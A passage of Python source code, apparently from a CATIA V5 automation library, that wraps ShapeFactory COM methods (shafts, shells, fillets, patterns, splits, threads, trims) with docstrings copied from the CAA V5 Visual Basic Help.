CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewScaling(Reference iScalingReference,
| double iFactor) As Scaling
|
| Creates and returns a new scaling within the current body.
|
| Parameters:
|
| iScalingReference
| The point, plane or face of the current body that will remain fixed
| during the scaling process: even if the face itself shrinks or expands during
| the scaling, its supporting plane will remain unchanged after the
| scaling.
| The following
|
| Boundary objects are supported: PlanarFace and Vertex.
|
| iFactor
| The scaling factor
| Returns:
| The created scaling
:param Reference i_scaling_reference:
:param float i_factor:
:return: Scaling
:rtype: Scaling
"""
return Scaling(self.shape_factory.AddNewScaling(i_scaling_reference.com_object, i_factor))
def add_new_sew_surface(self, i_sewing_element: Reference, i_sewing_side: int) -> SewSurface:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSewSurface(Reference iSewingElement,
| CatSplitSide iSewingSide) As SewSurface
|
| Creates and returns a new sewing operation within the current
| body.
|
| Parameters:
|
| iSewingElement
| The face or skin or surface that will be sewn on the current body
|
| iSewingSide
| The specification for which side of the current body should be kept
| at the end of the sewing operation
|
| Returns:
| The created sewing operation
:param Reference i_sewing_element:
:param int i_sewing_side:
:return: SewSurface
:rtype: SewSurface
"""
return SewSurface(self.shape_factory.AddNewSewSurface(i_sewing_element.com_object, i_sewing_side))
def add_new_shaft(self, i_sketch: Sketch) -> Shaft:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewShaft(Sketch iSketch) As Shaft
|
| Creates and returns a new shaft within the current body.
| The Revolution, as a supertype for shafts, provides starting and ending
| angles for the shaft definition.
|
| Parameters:
|
| iSketch
| The sketch defining the shaft section.
|
| If the shaft applies to the current body, then the sketch must
| contain a contour and an axis that will be used to rotate the contour in the
| space, thus defining the shaft.
| If the shaft is the first shape defined, there is not current
| body to apply to. In such a case, the sketch must contain a curve whose end
| points are linked by an axis. By rotating the curve in the space around the
| axis, the shaft operation will define a revolution shape. This also works if
| the sketch contains a closed contour and an axis outside of this contour: in
| that case a revolution shape will be created, for example a torus.
|
|
| Returns:
| The created shaft
:param Sketch i_sketch:
:return: Shaft
:rtype: Shaft
"""
return Shaft(self.shape_factory.AddNewShaft(i_sketch.com_object))
def add_new_shaft_from_ref(self, i_profile_elt: Reference) -> Shaft:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewShaftFromRef(Reference iProfileElt) As Shaft
|
| Creates and returns a new shaft within the current body.
|
| Parameters:
|
| iProfileElt
| The reference on the element defining the shaft base
|
|
| Returns:
| The created shaft
:param Reference i_profile_elt:
:return: Shaft
:rtype: Shaft
"""
return Shaft(self.shape_factory.AddNewShaftFromRef(i_profile_elt.com_object))
def add_new_shell(self, i_face_to_remove: Reference, i_internal_thickness: float,
i_external_thickness: float) -> Shell:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewShell(Reference iFaceToRemove,
| double iInternalThickness,
| double iExternalThickness) As Shell
|
| Creates and returns a new shell within the current body.
|
| Parameters:
|
| iFaceToRemove
| The first face to be removed in the shell process.
| The following
|
| Boundary object is supported: Face.
| iInternalThickness
| The thickness of material to be added on the internal side of all the
| faces during the shell process, except for those to be removed
|
| iExternaThickness
| The thickness of material to be added on the external side of all the
| faces during the shell process, except for those to be removed
|
| Returns:
| The created shell
:param Reference i_face_to_remove:
:param float i_internal_thickness:
:param float i_external_thickness:
:return: Shell
:rtype: Shell
"""
return Shell(
self.shape_factory.AddNewShell(i_face_to_remove.com_object, i_internal_thickness, i_external_thickness))
def add_new_slot(self, i_sketch: Sketch, i_center_curve: Sketch) -> Slot:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSlot(Sketch iSketch,
| Sketch iCenterCurve) As Slot
|
| Creates and returns a new slot within the current shape.
|
| Parameters:
|
| iSketch
| The sketch defining the slot section
| iCenterCurve
| The sketched curve that defines the slot center curve. It must
| cross the section definition sketch iSketch within the inner part of its
| contour.
|
| Returns:
| The created slot
:param Sketch i_sketch:
:param Sketch i_center_curve:
:return: Slot
:rtype: Slot
"""
return Slot(self.shape_factory.AddNewSlot(i_sketch.com_object, i_center_curve.com_object))
def add_new_slot_from_ref(self, i_profile: Reference, i_center_curve: Reference) -> Slot:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSlotFromRef(Reference iProfile,
| Reference iCenterCurve) As Slot
|
| Creates and returns a new slot within the current shape.
|
| Parameters:
|
| iProfile
| The sketch defining the slot section
| iCenterCurve
| The curve that defines the slot center curve.
| The following
|
| Boundary object is supported: TriDimFeatEdge.
| Returns:
| The created slot
:param Reference i_profile:
:param Reference i_center_curve:
:return: Slot
:rtype: Slot
"""
return Slot(self.shape_factory.AddNewSlotFromRef(i_profile.com_object, i_center_curve.com_object))
def add_new_solid_combine(self, i_profile_elt_first: Reference, i_profile_elt_second: Reference) -> SolidCombine:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSolidCombine(Reference iProfileEltFirst,
| Reference iProfileEltSecond) As SolidCombine
|
| Creates and returns a new SolidCombine feature.
|
| Parameters:
|
| iProfileEltFirst
| The reference of the element defining the profile for first
| component.
| iProfileEltSecond
| The reference of the element defining the profile for second
| component.
|
| Returns:
| The created SolidCombine feature.
:param Reference i_profile_elt_first:
:param Reference i_profile_elt_second:
:return: SolidCombine
:rtype: SolidCombine
"""
return SolidCombine(
self.shape_factory.AddNewSolidCombine(i_profile_elt_first.com_object, i_profile_elt_second.com_object))
def add_new_solid_edge_fillet_with_constant_radius(self, i_edge_to_fillet: Reference, i_propag_mode: int,
i_radius: float) -> ConstRadEdgeFillet:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSolidEdgeFilletWithConstantRadius(Reference
| iEdgeToFillet,
| CatFilletEdgePropagation iPropagMode,
| double iRadius) As ConstRadEdgeFillet
|
| Creates and returns a new solid edge fillet with a constant radius. within
| the current body.
|
| Parameters:
|
| iEdgeToFillet
| The edge that will be filleted first
| The following
|
| Boundary object is supported: TriDimFeatEdge.
| iPropagMode
| Controls whether other edges found adjacent to the first one should
| also be filleted in the same operation
| iRadius
| The fillet radius
| Returns:
| The created edge fillet
:param Reference i_edge_to_fillet:
:param int i_propag_mode:
:param float i_radius:
:return: ConstRadEdgeFillet
:rtype: ConstRadEdgeFillet
"""
return ConstRadEdgeFillet(
self.shape_factory.AddNewSolidEdgeFilletWithConstantRadius(i_edge_to_fillet.com_object, i_propag_mode,
i_radius))
def add_new_solid_edge_fillet_with_varying_radius(self, i_edge_to_fillet: Reference, i_propag_mode: int,
i_variation_mode: int,
i_default_radius: float) -> VarRadEdgeFillet:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSolidEdgeFilletWithVaryingRadius(Reference
| iEdgeToFillet,
| CatFilletEdgePropagation iPropagMode,
| CatFilletVariation iVariationMode,
| double iDefaultRadius) As VarRadEdgeFillet
|
| Creates and returns a new solid edge fillet with a varying radius. within
| the current body.
|
| Parameters:
|
| iEdgeToFillet
| The edge that will be filleted first
| The following
|
| Boundary object is supported: TriDimFeatEdge.
| iPropagMode
| Controls whether other edges found adjacent to the first one should
| also be filleted in the same operation
| iVariationMode
| Controls the law of evolution for the fillet radius between specified
| control points, such as edges extremities
| iDefaultRadius
| The fillet default radius, that will apply when no other radius can be
| inferred from the iVariationMode parameter
| Returns:
| The created edge fillet
:param Reference i_edge_to_fillet:
:param int i_propag_mode:
:param int i_variation_mode:
:param float i_default_radius:
:return: VarRadEdgeFillet
:rtype: VarRadEdgeFillet
"""
return VarRadEdgeFillet(
self.shape_factory.AddNewSolidEdgeFilletWithVaryingRadius(i_edge_to_fillet.com_object, i_propag_mode,
i_variation_mode, i_default_radius))
def add_new_solid_face_fillet(self, i_f1: Reference, i_f2: Reference, i_radius: float) -> FaceFillet:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSolidFaceFillet(Reference iF1,
| Reference iF2,
| double iRadius) As FaceFillet
|
| Creates and returns a new solid face-to-face fillet.
| Use this method to created face-to-face fillets with varying fillet radii,
| by editing fillet attributes driving its radius after its
| creation.
|
| Parameters:
|
| iF1
| The first face that will support the fillet
| The following
|
| Boundary object is supported: Face.
| iF2
| The second face that will support the fillet
| The following Boundary object is supported: Face.
| iRadius
| The fillet radius
| Returns:
| The created face-to-face fillet
:param Reference i_f1:
:param Reference i_f2:
:param float i_radius:
:return: FaceFillet
:rtype: FaceFillet
"""
return FaceFillet(self.shape_factory.AddNewSolidFaceFillet(i_f1.com_object, i_f2.com_object, i_radius))
def add_new_solid_tritangent_fillet(self, i_f1: Reference, i_f2: Reference,
i_removed_face: Reference) -> TritangentFillet:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSolidTritangentFillet(Reference iF1,
| Reference iF2,
| Reference iRemovedFace) As TritangentFillet
|
| Creates and returns a new solid tritangent fillet within the current
| body.
| This kind of fillet begins with tangency on a first face iF1, gets tangent
| to a second one iRemovedFace and ends with tangency to a third one iF2. During
| the process the second face iRemovedFace is removed.
|
| Parameters:
|
| iF1
| The starting face for the fillet
| The following
|
| Boundary object is supported: Face.
| iF2
| The ending face for the fillet
| The following Boundary object is supported: Face.
| iRemovedFace
| The face used as an intermediate tangent support for the fillet during
| its course from iF1 to iF2. This face will be removed at the end of the
| filleting operation.
| The following Boundary object is supported: Face
| Returns:
| The created tritangent fillet
:param Reference i_f1:
:param Reference i_f2:
:param Reference i_removed_face:
:return: TritangentFillet
:rtype: TritangentFillet
"""
return TritangentFillet(
self.shape_factory.AddNewSolidTritangentFillet(i_f1.com_object, i_f2.com_object, i_removed_face.com_object))
def add_new_split(self, i_splitting_element: Reference, i_split_side: int) -> Split:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSplit(Reference iSplittingElement,
| CatSplitSide iSplitSide) As Split
|
| Creates and returns a new split operation within the current
| body.
|
| Parameters:
|
| iSplittingElement
| The face or plane that will split the current body
| The following
|
| Boundary object is supported: Face.
| iSplitSide
| The specification for which side of the current body should be kept at
| the end of the split operation
| Returns:
| The created split operation
:param Reference i_splitting_element:
:param int i_split_side:
:return: Split
:rtype: Split
"""
return Split(self.shape_factory.AddNewSplit(i_splitting_element.com_object, i_split_side))
def add_new_stiffener(self, i_sketch: Sketch) -> Stiffener:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewStiffener(Sketch iSketch) As Stiffener
|
| Creates and returns a new stiffener within the current
| body.
| A stiffener is made up of a sketch used as the stiffener profile, that is
| extruded (offset) and that fills the nearest shape.
|
| Parameters:
|
| iSketch
| The sketch defining the stiffener border. It must contain a line or
| a curve that does not cross in 3D space the face(s) to stiffen.
|
|
| Returns:
| The created stiffener
:param Sketch i_sketch:
:return: Stiffener
:rtype: Stiffener
"""
return Stiffener(self.shape_factory.AddNewStiffener(i_sketch.com_object))
def add_new_stiffener_from_ref(self, i_profile_elt: Reference) -> Stiffener:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewStiffenerFromRef(Reference iProfileElt) As
| Stiffener
|
| Creates and returns a new stiffener within the current
| body.
|
| Parameters:
|
| iProfileElt
| The reference on the element defining the stiffener profile
|
|
| Returns:
| The created stiffener
:param Reference i_profile_elt:
:return: Stiffener
:rtype: Stiffener
"""
return Stiffener(self.shape_factory.AddNewStiffenerFromRef(i_profile_elt.com_object))
def add_new_surface_edge_fillet_with_constant_radius(self, i_edge_to_fillet: Reference, i_propag_mode: int,
i_radius: float) -> ConstRadEdgeFillet:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSurfaceEdgeFilletWithConstantRadius(Reference
| iEdgeToFillet,
| CatFilletEdgePropagation iPropagMode,
| double iRadius) As ConstRadEdgeFillet
|
| Creates and returns a new surface edge fillet with a constant radius.
| within the current body.
|
| Parameters:
|
| iEdgeToFillet
| The edge that will be filleted first
| The following
|
| Boundary object is supported: TriDimFeatEdge.
| iPropagMode
| Controls whether other edges found adjacent to the first one should
| also be filleted in the same operation
| iRadius
| The fillet radius
| Returns:
| The created edge fillet
:param Reference i_edge_to_fillet:
:param int i_propag_mode:
:param float i_radius:
:return: ConstRadEdgeFillet
:rtype: ConstRadEdgeFillet
"""
return ConstRadEdgeFillet(
self.shape_factory.AddNewSurfaceEdgeFilletWithConstantRadius(i_edge_to_fillet.com_object, i_propag_mode,
i_radius))
def add_new_surface_edge_fillet_with_varying_radius(self, i_edge_to_fillet: Reference, i_propag_mode: int,
i_variation_mode: int,
i_default_radius: float) -> VarRadEdgeFillet:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSurfaceEdgeFilletWithVaryingRadius(Reference
| iEdgeToFillet,
| CatFilletEdgePropagation iPropagMode,
| CatFilletVariation iVariationMode,
| double iDefaultRadius) As VarRadEdgeFillet
|
| Creates and returns a new surface edge fillet with a varying radius. within
| the current body.
|
| Parameters:
|
| iEdgeToFillet
| The edge that will be filleted first
| The following
|
| Boundary object is supported: TriDimFeatEdge.
| iPropagMode
| Controls whether other edges found adjacent to the first one should
| also be filleted in the same operation
| iVariationMode
| Controls the law of evolution for the fillet radius between specified
| control points, such as edges extremities
| iDefaultRadius
| The fillet default radius, that will apply when no other radius can be
| inferred from the iVariationMode parameter
| Returns:
| The created edge fillet
:param Reference i_edge_to_fillet:
:param int i_propag_mode:
:param int i_variation_mode:
:param float i_default_radius:
:return: VarRadEdgeFillet
:rtype: VarRadEdgeFillet
"""
return VarRadEdgeFillet(
self.shape_factory.AddNewSurfaceEdgeFilletWithVaryingRadius(i_edge_to_fillet.com_object, i_propag_mode,
i_variation_mode, i_default_radius))
def add_new_surface_face_fillet(self, i_f1: Reference, i_f2: Reference, i_radius: float) -> FaceFillet:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSurfaceFaceFillet(Reference iF1,
| Reference iF2,
| double iRadius) As FaceFillet
|
| Creates and returns a new surface face-to-face fillet.
| Use this method to created face-to-face fillets with varying fillet radii,
| by editing fillet attributes driving its radius after its
| creation.
|
| Parameters:
|
| iF1
| The first face that will support the fillet
| The following
|
| Boundary object is supported: Face.
| iF2
| The second face that will support the fillet
| The following Boundary object is supported: Face.
| iRadius
| The fillet radius
| Returns:
| The created face-to-face fillet
:param Reference i_f1:
:param Reference i_f2:
:param float i_radius:
:return: FaceFillet
:rtype: FaceFillet
"""
return FaceFillet(self.shape_factory.AddNewSurfaceFaceFillet(i_f1.com_object, i_f2.com_object, i_radius))
def add_new_surface_tritangent_fillet(self, i_f1: Reference, i_f2: Reference,
i_removed_face: Reference) -> TritangentFillet:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSurfaceTritangentFillet(Reference iF1,
| Reference iF2,
| Reference iRemovedFace) As TritangentFillet
|
| Creates and returns a new surface tritangent fillet within the current
| body.
| This kind of fillet begins with tangency on a first face iF1, gets tangent
| to a second one iRemovedFace and ends with tangency to a third one iF2. During
| the process the second face iRemovedFace is removed.
|
| Parameters:
|
| iF1
| The starting face for the fillet
| The following
|
| Boundary object is supported: Face.
| iF2
| The ending face for the fillet
| The following Boundary object is supported: Face.
| iRemovedFace
| The face used as an intermediate tangent support for the fillet during
| its course from iF1 to iF2. This face will be removed at the end of the
| filleting operation.
| The following Boundary object is supported: Face
| Returns:
| The created tritangent fillet
:param Reference i_f1:
:param Reference i_f2:
:param Reference i_removed_face:
:return: TritangentFillet
:rtype: TritangentFillet
"""
return TritangentFillet(self.shape_factory.AddNewSurfaceTritangentFillet(i_f1.com_object, i_f2.com_object,
i_removed_face.com_object))
def add_new_surfacic_auto_fillet(self, i_fillet_radius: float) -> AutoFillet:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSurfacicAutoFillet(double iFilletRadius) As
| AutoFillet
|
| Creates and returns a new Surfacic autofillet.
| Use this method to create autofillet by providing fillet radius
| value.
|
| Parameters:
|
| iFilletRadius
| The fillet radius
|
| Returns:
| The created autofillet
:param float i_fillet_radius:
:return: AutoFillet
:rtype: AutoFillet
"""
return AutoFillet(self.shape_factory.AddNewSurfacicAutoFillet(i_fillet_radius))
def add_new_surfacic_circ_pattern(self, i_shape_to_copy: AnyObject, i_nb_of_copies_in_radial_dir: int,
i_nb_of_copies_in_angular_dir: int, i_step_in_radial_dir: float,
i_step_in_angular_dir: float, i_shape_to_copy_position_along_radial_dir: int,
i_shape_to_copy_position_along_angular_dir: int, i_rotation_center: Reference,
i_rotation_axis: Reference, i_is_reversed_rotation_axis: bool,
i_rotation_angle: float, i_is_radius_aligned: bool,
i_complete_crown: bool) -> CircPattern:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSurfacicCircPattern(AnyObject iShapeToCopy,
| long iNbOfCopiesInRadialDir,
| long iNbOfCopiesInAngularDir,
| double iStepInRadialDir,
| double iStepInAngularDir,
| long iShapeToCopyPositionAlongRadialDir,
| long iShapeToCopyPositionAlongAngularDir,
| Reference iRotationCenter,
| Reference iRotationAxis,
| boolean iIsReversedRotationAxis,
| double iRotationAngle,
| boolean iIsRadiusAligned,
| boolean iCompleteCrown) As CircPattern
|
| Creates and returns a new gsd circular pattern within the current
| body.
|
| Parameters:
|
| iShapeToCopy
| The shape to be copied by the circular pattern
| iNbOfInstancesInRadialDir
| The number of times iShapeToCopy will be copied along pattern
| radial direction
| iNbOfInstancesInAngularDir
| The number of times iShapeToCopy will be copied along pattern
| angular direction
| iStepInRadialDir
| The distance that will separate two consecutive copies in the
| pattern along its radial direction
| iStepInAngularDir
| The angle that will separate two consecutive copies in the pattern
| along its angular direction
| iShapeToCopyPositionAlongRadialDir
| Specifies the position of the original shape iShapeToCopy among its
| copies along the radial direction
| iShapeToCopyPositionAlongAngularDir
| Specifies the position of the original shape iShapeToCopy among its
| copies along the angular direction
| iRotationCenter
| The point or vertex that specifies the pattern center of rotation
|
| iRotationAxis
| The line or linear edge that specifies the axis around which
| instances will be rotated relative to each other
| The following
|
| Boundary objects are supported: PlanarFace , CylindricalFace ,
| RectilinearTriDimFeatEdge and RectilinearBiDimFeatEdge.
|
| iIsReversedRotationAxis
| The boolean flag indicating wether the natural orientation of
| iRotationAxis should be used to orient the pattern operation. A value of true
| indicates that iItemToDuplicate are copied in the direction of the natural
| orientation of iRotationAxis.
| iRotationAngle
| The angle applied to the direction iRotationAxis prior to applying the
| pattern. The original shape iShapeToCopy is used as the rotation center.
| Nevertheless, the copied shapes themselves are not rotated. This allows the
| definition of a circular pattern relatively to existing geometry, but not
| necessarily parallel to it.
| iIsRadiusAligned
| The boolean flag that specifies whether the instances of
| iItemToDuplicate copied by the pattern should be kept parallel to each other
| (True) or if they should be aligned with the radial direction they lie upon
| (False).
| iCompleteCrown
| The boolean flag specifies the mode of angular distribution. True
| indicates that the angular step will be equal to 360 degrees iNba.
|
| Returns:
| The created circular pattern
:param AnyObject i_shape_to_copy:
:param int i_nb_of_copies_in_radial_dir:
:param int i_nb_of_copies_in_angular_dir:
:param float i_step_in_radial_dir:
:param float i_step_in_angular_dir:
:param int i_shape_to_copy_position_along_radial_dir:
:param int i_shape_to_copy_position_along_angular_dir:
:param Reference i_rotation_center:
:param Reference i_rotation_axis:
:param bool i_is_reversed_rotation_axis:
:param float i_rotation_angle:
:param bool i_is_radius_aligned:
:param bool i_complete_crown:
:return: CircPattern
:rtype: CircPattern
"""
return CircPattern(
self.shape_factory.AddNewSurfacicCircPattern(i_shape_to_copy.com_object, i_nb_of_copies_in_radial_dir,
i_nb_of_copies_in_angular_dir, i_step_in_radial_dir,
i_step_in_angular_dir,
i_shape_to_copy_position_along_radial_dir,
i_shape_to_copy_position_along_angular_dir,
i_rotation_center.com_object, i_rotation_axis.com_object,
i_is_reversed_rotation_axis, i_rotation_angle,
i_is_radius_aligned, i_complete_crown))
def add_new_surfacic_rect_pattern(self, i_shape_to_copy: AnyObject, i_nb_of_copies_in_dir1: int,
i_nb_of_copies_in_dir2: int, i_step_in_dir1: float, i_step_in_dir2: float,
i_shape_to_copy_position_along_dir1: int,
i_shape_to_copy_position_along_dir2: int, i_dir1: Reference, i_dir2: Reference,
i_is_reversed_dir1: bool, i_is_reversed_dir2: bool,
i_rotation_angle: float) -> RectPattern:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSurfacicRectPattern(AnyObject iShapeToCopy,
| long iNbOfCopiesInDir1,
| long iNbOfCopiesInDir2,
| double iStepInDir1,
| double iStepInDir2,
| long iShapeToCopyPositionAlongDir1,
| long iShapeToCopyPositionAlongDir2,
| Reference iDir1,
| Reference iDir2,
| boolean iIsReversedDir1,
| boolean iIsReversedDir2,
| double iRotationAngle) As RectPattern
|
| Creates and returns a new GSD rectangular pattern within the current
| body.
|
| Parameters:
|
| iShapeToCopy
| The shape to be copied by the rectangular pattern
| iNbOfCopiesInDir1
| The number of times iShapeToCopy will be copied along the pattern
| first direction
| iNbOfCopiesInDir2
| The number of times iShapeToCopy will be copied along the pattern
| second direction
| iStepInDir1
| The distance that will separate two consecutive copies in the
| pattern along its first direction
| iStepInDir2
| The distance that will separate two consecutive copies in the
| pattern along its second direction
| iShapeToCopyPositionAlongDir1
| Specifies the position of the original shape iShapeToCopy among its
| copies along iDir1
| iShapeToCopyPositionAlongDir2
| Specifies the position of the original shape iShapeToCopy among its
| copies along iDir2
| iDir1
| The line or linear edge that specifies the pattern first
| repartition direction
| The following
|
| Boundary objects are supported: PlanarFace, RectilinearTriDimFeatEdge,
| RectilinearBiDimFeatEdge.
| iDir2
| The line or linear edge that specifies the pattern second repartition
| direction
| The following Boundary objects are supported: PlanarFace,
| RectilinearTriDimFeatEdge, RectilinearBiDimFeatEdge.
| iIsReversedDir1
| The boolean flag indicating whether the natural orientation of iDir1
| should be used to orient the pattern operation. True indicates that
| iShapeToCopy is copied in the direction of the natural orientation of iDir1.
|
| iIsReversedDir2
| The boolean flag indicating whether the natural orientation of iDir2
| should be used to orient the pattern operation. True indicates that
| iShapeToCopy is copied in the direction of the natural orientation of iDir2.
|
| iRotationAngle
| The angle applied to both directions iDir1 and iDir2 prior to applying
| the pattern. The original shape iShapeToCopy is used as the rotation center.
| Nevertheless, the copied shapes themselves are not rotated. This allows the
| definition of a rectangular pattern relatively to existing geometry, but not
| necessarily parallel to it.
| Returns:
| The created rectangular pattern
:param AnyObject i_shape_to_copy:
:param int i_nb_of_copies_in_dir1:
:param int i_nb_of_copies_in_dir2:
:param float i_step_in_dir1:
:param float i_step_in_dir2:
:param int i_shape_to_copy_position_along_dir1:
:param int i_shape_to_copy_position_along_dir2:
:param Reference i_dir1:
:param Reference i_dir2:
:param bool i_is_reversed_dir1:
:param bool i_is_reversed_dir2:
:param float i_rotation_angle:
:return: RectPattern
:rtype: RectPattern
"""
return RectPattern(
self.shape_factory.AddNewSurfacicRectPattern(i_shape_to_copy.com_object, i_nb_of_copies_in_dir1,
i_nb_of_copies_in_dir2, i_step_in_dir1, i_step_in_dir2,
i_shape_to_copy_position_along_dir1,
i_shape_to_copy_position_along_dir2, i_dir1.com_object,
i_dir2.com_object, i_is_reversed_dir1, i_is_reversed_dir2,
i_rotation_angle))
def add_new_surfacic_sew_surface(self, i_type: int, i_support_surface: Reference, i_sewing_element: Reference,
i_sewing_side: int) -> SewSurface:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSurfacicSewSurface(long iType,
| Reference iSupportSurface,
| Reference iSewingElement,
| CatSplitSide iSewingSide) As SewSurface
|
| Creates and returns a new volume sewing operation within the current
| OGS/GS.
|
| Parameters:
|
| iType
| Parameter to determine the sewing type. For Volume sewing Type = 4
| iSupportSurface
| The surfacic support on which sew operation will be performed
|
| iSewingElement
| The face or skin or surface that will be sewn on the current volume
| support
| iSewingSide
| The specification for which side of the current volume should be
| kept at the end of the sewing operation
|
| Returns:
| The created sewing operation
:param int i_type:
:param Reference i_support_surface:
:param Reference i_sewing_element:
:param int i_sewing_side:
:return: SewSurface
:rtype: SewSurface
"""
return SewSurface(self.shape_factory.AddNewSurfacicSewSurface(i_type, i_support_surface.com_object,
i_sewing_element.com_object, i_sewing_side))
def add_new_surfacic_user_pattern(self, i_shape_to_copy: AnyObject, i_nb_of_copies: int) -> UserPattern:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSurfacicUserPattern(AnyObject iShapeToCopy,
| long iNbOfCopies) As UserPattern
|
| Creates and returns a new GSD user pattern within the current
| body.
|
| Parameters:
|
| iShapeToCopy
| The shape to be copied by the user pattern
| iNbOfCopies
| The number of times iShapeToCopy will be copied
|
| Returns:
| The created user pattern
:param AnyObject i_shape_to_copy:
:param int i_nb_of_copies:
:return: UserPattern
:rtype: UserPattern
"""
return UserPattern(self.shape_factory.AddNewSurfacicUserPattern(i_shape_to_copy.com_object, i_nb_of_copies))
def add_new_thick_surface(self, i_offset_element: Reference, i_isens_offset: int, i_top_offset: float,
i_bot_offset: float) -> ThickSurface:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewThickSurface(Reference iOffsetElement,
| long iIsensOffset,
| double iTopOffset,
| double iBotOffset) As ThickSurface
|
| Creates and returns a new ThickSurface feature.
|
| Parameters:
|
| iOffsetElement
| The skin that will be thicken and added with the current body
|
| iIsensOffset
| The direction of the offset in regard to the direction of the
| normal
| iTopOffset
| The Offset between the iOffsetElement and the upper skin of the
| resulting feature
| iBotOffset
| The Offset between the iOffsetElement and the lower skin of the
| resulting feature
|
| Returns:
| The created ThickSurface feature
:param Reference i_offset_element:
:param int i_isens_offset:
:param float i_top_offset:
:param float i_bot_offset:
:return: ThickSurface
:rtype: ThickSurface
"""
return ThickSurface(
self.shape_factory.AddNewThickSurface(i_offset_element.com_object, i_isens_offset, i_top_offset,
i_bot_offset))
def add_new_thickness(self, i_face_to_thicken: Reference, i_offset: float) -> Thickness:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewThickness(Reference iFaceToThicken,
| double iOffset) As Thickness
|
| Creates and returns a new thickness within the current
| body.
|
| Parameters:
|
| iFaceToThicken
| The first face to thicken in the thickening
| process.
| New faces to thicken can be added to the thickness afterwards by
| using methods offered by the created thickness
| The following
|
| Boundary object is supported: Face.
| iOffset
| The thickness of material to be added on the external side of the face
| iFaceToThicken during the thickening process
| Returns:
| The created thickness
:param Reference i_face_to_thicken:
:param float i_offset:
:return: Thickness
:rtype: Thickness
"""
return Thickness(self.shape_factory.AddNewThickness(i_face_to_thicken.com_object, i_offset))
def add_new_thread_with_out_ref(self) -> Thread:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewThreadWithOutRef() As Thread
|
| Creates and returns a new thread\tap within the current
| body.
|
| Returns:
| The created Thread
:return: Thread
:rtype: Thread
"""
return Thread(self.shape_factory.AddNewThreadWithOutRef())
def add_new_thread_with_ref(self, i_lateral_face: Reference, i_limit_face: Reference) -> Thread:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewThreadWithRef(Reference iLateralFace,
| Reference iLimitFace) As Thread
|
| Creates and returns a new thread\tap within the current
| body.
|
| Parameters:
|
| iLateralFace
| The Face defining the support of thread\tap
| The following
|
| Boundary object is supported: Face.
| iLimitFacee
| The Face defining the origin of the thread.
| The following Boundary object is supported:
| PlanarFace.
| Returns:
| The created Thread
:param Reference i_lateral_face:
:param Reference i_limit_face:
:return: Thread
:rtype: Thread
"""
return Thread(self.shape_factory.AddNewThreadWithRef(i_lateral_face.com_object, i_limit_face.com_object))
def add_new_trim(self, i_body_to_trim: Body) -> Trim:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewTrim(Body iBodyToTrim) As Trim
|
| Creates and returns a new Trim operation within the current
| body.
|
| Parameters:
|
| iBodyToTrim
| The body to Trim with current body.
|
| Returns:
| The created Trim operation
:param Body i_body_to_trim:
:return: Trim
:rtype: Trim
"""
return Trim(self.shape_factory.AddNewTrim(i_body_to_trim.com_object))
def add_new_tritangent_fillet(self, i_f1: Reference, i_f2: Reference,
i_removed_face: Reference) -> TritangentFillet:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewTritangentFillet(Reference iF1,
| Reference iF2,
| Reference iRemovedFace) As TritangentFillet
|
| Deprecated:
| V5R14 #AddNewTritangentFillet use AddNewSolidTritangentFillet or
| AddNewSurfaceTritangentFillet depending on the type of fillet you want to
| create
:param Reference i_f1:
:param Reference i_f2:
:param Reference i_removed_face:
:return: TritangentFillet
:rtype: TritangentFillet
"""
return TritangentFillet(
self.shape_factory.AddNewTritangentFillet(i_f1.com_object, i_f2.com_object, i_removed_face.com_object))
